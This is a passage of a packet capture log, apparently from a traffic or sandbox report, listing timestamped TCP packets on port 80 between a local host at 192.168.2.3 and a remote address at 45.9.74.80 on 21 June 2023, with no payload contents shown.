Jun 21, 2023 04:27:57.799621105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799666882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799686909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799731970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799748898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799796104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799841881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799861908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799906015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799948931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799968958 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800012112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800055981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800098896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800117970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800162077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800205946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800228119 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800277948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800308943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800354004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800400972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800420046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800463915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800512075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800574064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800586939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800625086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800664902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800683022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800715923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800734997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800771952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800808907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800848007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800864935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.800901890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800937891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800981998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.800993919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801012039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801045895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801059961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801099062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801126957 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801156044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801168919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801208019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801224947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801263094 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801278114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801316023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801333904 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801377058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801388979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801424980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801441908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801479101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801496983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801533937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801569939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801594973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801621914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801640034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801678896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801697016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801738024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.801749945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.801796913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.805377960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806315899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806359053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806397915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806421995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806421995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806468010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806488991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806528091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806566000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806585073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806622028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806660891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806678057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806715012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806730032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806767941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806807041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806824923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806862116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806899071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806915998 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.806972027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.806983948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807025909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807065010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807082891 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807121038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807159901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807178974 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807214022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807231903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807269096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807306051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807322979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807358027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807398081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807415962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807452917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807468891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807511091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807549000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807565928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807604074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807641983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807660103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807697058 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807713032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807750940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807790041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807806969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807843924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807882071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.807899952 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807934999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.807951927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808005095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808044910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808063984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808098078 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808116913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808154106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808192968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808213949 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808249950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808311939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808324099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808362961 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808377981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808417082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808454990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808475018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808511972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808547974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808563948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808607101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808619022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.808655977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808696032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.808712959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.812853098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827059031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827099085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827119112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827138901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827167988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827188969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827219963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827251911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827270985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827284098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827299118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827326059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827341080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827367067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827393055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827419043 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827435017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827450037 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827476978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827491045 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827517986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827531099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827558041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827570915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827596903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827610970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827639103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827667952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827688932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827708006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827722073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827747107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827774048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827796936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827817917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827827930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827853918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827883005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827907085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827928066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827935934 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.827963114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.827991009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828012943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828032017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828044891 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828069925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828099012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828123093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828145027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828152895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828178883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828210115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828236103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828252077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828278065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828310966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828339100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828371048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828382015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828394890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828421116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828449965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828470945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828494072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828522921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828545094 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828563929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828576088 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828600883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828629017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828650951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828670979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828685999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828710079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828738928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828762054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828778982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828790903 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828816891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828844070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828866005 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828886032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828901052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828927040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828954935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.828979969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.828995943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829010010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829035997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829063892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829085112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829104900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829133034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829154968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829173088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829185963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829211950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829240084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829263926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829282045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829294920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829319954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829346895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829370022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829391003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829418898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829438925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.829461098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.829474926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.832711935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.846292973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.846427917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.871902943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.871985912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872033119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872071981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872103930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872122049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872168064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872211933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872231007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872298956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872348070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872368097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872397900 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872430086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872476101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872529984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872545958 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872590065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872636080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872682095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872773886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872796059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872833014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872833014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.872875929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872921944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872967958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.872988939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873040915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873054981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873096943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873152018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873166084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873209000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873261929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873275995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873320103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873366117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873413086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873430967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873477936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873523951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873543024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873568058 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873605967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873651028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873697996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873719931 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873764038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873852968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873900890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873919964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.873964071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.873989105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874030113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874073982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874095917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874142885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874195099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874208927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874253035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874300003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874345064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874365091 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874409914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874463081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874478102 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874511003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874540091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874587059 CEST	80	49719	45.9.74.80	192.168.2.3
